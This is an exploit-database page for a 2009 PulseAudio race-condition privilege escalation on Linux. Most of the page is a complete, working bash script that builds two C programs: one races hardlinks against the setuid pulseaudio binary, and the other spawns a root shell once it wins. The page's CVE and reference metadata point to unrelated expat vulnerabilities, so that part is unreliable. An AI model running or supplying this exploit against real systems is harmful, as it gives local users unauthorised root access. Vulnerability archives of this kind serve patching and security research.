header-logo
Suggest Exploit
vendor:
PulseAudio
by:
Tavis Ormandy
7,2
CVSS
HIGH
Race Condition
362
CWE
Product Name: PulseAudio
Affected Version From: 0.9.15
Affected Version To: 0.9.21
Patch Exists: YES
Related CWE: CVE-2009-2625
CPE: a:pulseaudio:pulseaudio
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-3560/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-3560/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2009-3560/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-e9fca207-e399-11de-881e-001aa0166822/https://www.rapid7.com/db/vulnerabilities/apple-itunes-cve-2009-3560/https://www.rapid7.com/db/vulnerabilities/ibm-http_server-cve-2009-3560/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2009-3560/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2009-3560/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0004-2-vma-and-service-console-package-expat-cve-2009-3560/https://www.rapid7.com/db/vulnerabilities/vmsa-2012-0001-cve-2009-3560/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1551/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-890-2/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-890-1/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2009-1572/https://www.rapid7.com/db/vulnerabilities/vmsa-2012-0001-cve-2009-3720/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2009-3720/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0004-2-vma-and-service-console-package-expat-cve-2009-3720/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2009-3720/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-890-5/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-890-3/https://www.rapid7.com/db/?q=CVE-2009-2625&type=&page=2https://www.rapid7.com/db/?q=CVE-2009-2625&type=&page=3https://www.rapid7.com/db/?q=CVE-2009-2625&type=&page=2
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2009

PulseAudio Race Condition Privilege Escalation

This exploit is a race condition vulnerability in PulseAudio, which allows a local user to gain root privileges. The exploit works by creating a hard link to the PulseAudio binary, and then creating a second hard link to a malicious shell script. The exploit then forks a child process, which executes the PulseAudio binary. If the malicious shell script is executed before the PulseAudio binary, the user will gain root privileges.

Mitigation:

Upgrade to the latest version of PulseAudio
Source

Exploit-DB raw data:

#!/bin/bash

pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`

trap cleanup INT

function cleanup()
{
	rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c 
	rm -rf $workdir/PATMP*
}

cat > $workdir/pa_race.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/wait.h>

#define PULSEAUDIO_PATH		"$pulseaudio"
#define SH_PATH			"$workdir/sh"
#define TMPDIR_TEMPLATE		"$workdir/PATMPXXXXXX"

void _pause(long sec, long usec);

int main(int argc, char *argv[], char *envp[])
{
	int   status;
	pid_t pid;
	char  template[sizeof(TMPDIR_TEMPLATE)];
	char *tmpdir;
	char  hardlink[sizeof(template) + 2];
	char  hardlink2[sizeof(template) + 12];
	
	srand(time(NULL));
	
	for( ; ; )
	{
		snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
		template[sizeof(template) - 1] = '\0';
		
		tmpdir = mkdtemp(template);
		if(tmpdir == NULL)
		{
			perror("mkdtemp");
			return 1;
		}
	
		snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
		hardlink[sizeof(hardlink) - 1] = '\0';
	
		snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
		hardlink2[sizeof(hardlink2) - 1] = '\0';
	
		/* this fails if $workdir is a different partition */
		if(link(PULSEAUDIO_PATH, hardlink) == -1)
		{
			perror("link");
			return 1;
		}
		
		if(link(SH_PATH, hardlink2) == -1)
		{
			perror("link");
			return 1;
		}
		
		pid = fork();
		
		if(pid == 0)
		{
			char *argv[] = {hardlink, NULL};
			char *envp[] = {NULL};

			execve(hardlink, argv, envp);
			
			perror("execve");
			return 1;
		}
		
		if(pid == -1)
		{
			perror("fork");
			return 1;
		}
		else
		{
			/* tweak this if exploit does not work */
			_pause(0, rand() % 500);
			
			if(unlink(hardlink) == -1)
			{
				perror("unlink");
				return 1;
			}
	
			if(link(SH_PATH, hardlink) == -1)
			{
				perror("link");
				return 1;
			}
			waitpid(pid, &status, 0);
		}
		
		if(unlink(hardlink) == -1)
		{
			perror("unlink");
			return 1;
		}
		
		if(unlink(hardlink2) == -1)
		{
			perror("unlink");
			return 1;
		}
		
		if(rmdir(tmpdir) == -1)
		{
			perror("rmdir");
			return 1;
		}
	}
		
	return 0;
}

void _pause(long sec, long usec)
{
	struct timeval timeout;
	
	timeout.tv_sec  = sec;
	timeout.tv_usec = usec;
	
	if(select(0, NULL, NULL, NULL, &timeout) == -1)
	{
		perror("select");
	}
}
__EOF__

cat > $workdir/sh.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>


int main(int argc, char *argv[], char *envp[])
{
	if(geteuid() != 0)
	{
		return 1;
	}

	setuid(0);
	setgid(0);

	if(fork() == 0)
	{
		argv[0] = "$id";
		argv[1] = NULL;
		execve(argv[0], argv, envp);
		return 1;
	}

	argv[0] = "$shell";
	argv[1] = NULL;
	execve(argv[0], argv, envp);
	return 1;
}
__EOF__

gcc -o $workdir/pa_race $workdir/pa_race.c
gcc -o $workdir/sh $workdir/sh.c

$workdir/pa_race

# milw0rm.com [2009-07-20]

Navigation

Suggest Exploit

Services By CQR